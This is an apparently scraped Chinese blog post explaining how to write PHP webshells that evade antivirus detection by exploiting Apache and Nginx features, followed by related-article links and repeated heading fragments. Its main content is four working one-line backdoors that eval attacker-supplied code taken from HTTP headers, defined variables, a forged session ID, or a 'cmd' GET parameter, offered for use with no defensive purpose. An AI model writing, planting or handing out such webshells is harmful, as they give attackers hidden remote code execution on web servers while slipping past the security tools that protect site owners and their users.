PHP利用ApacheNginx的特性实现免杀Webshell

Posted 2020-11-26 err0">tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了PHP利用ApacheNginx的特性实现免杀Webshell相关的知识，希望对你有一定的参考价值。

环境函数用法

nginx get_defined_vars() 返回由所有已定义变量所组成的数组

apache getallheaders() 获取全部 HTTP 请求头信息

apache环境

1

2

3

<?php

eval(next(getallheaders()));

?>

apache和nginx环境通用

1

2

3

<?php

eval(implode(reset(get_defined_vars())));

?>

另外一种通过执行伪造的sessionid值，进行任意代码执行。

1

2

3

<?php

eval(hex2bin(session_id(session_start())));

?>

给 webshell加密码

1

<?php eval(get_defined_vars()[‘_GET‘][‘cmd‘]);?>

以上是关于PHP利用ApacheNginx的特性实现免杀Webshell的主要内容，如果未能解决你的问题，请参考以下文章

实现简单木马免杀

PHP一句话木马Webshell变形免杀总结

免杀原理与实践

apachenginx实现反向代理

20155217《网络对抗》Exp03 免杀原理与实践

Windows免杀小结（工具篇）

环境	函数	用法
nginx	`get_defined_vars()`	返回由所有已定义变量所组成的数组
apache	`getallheaders()`	获取全部 HTTP 请求头信息

PHP利用ApacheNginx的特性实现免杀Webshell

apache环境

apache和nginx环境通用

给webshell加密码

给 webshell加密码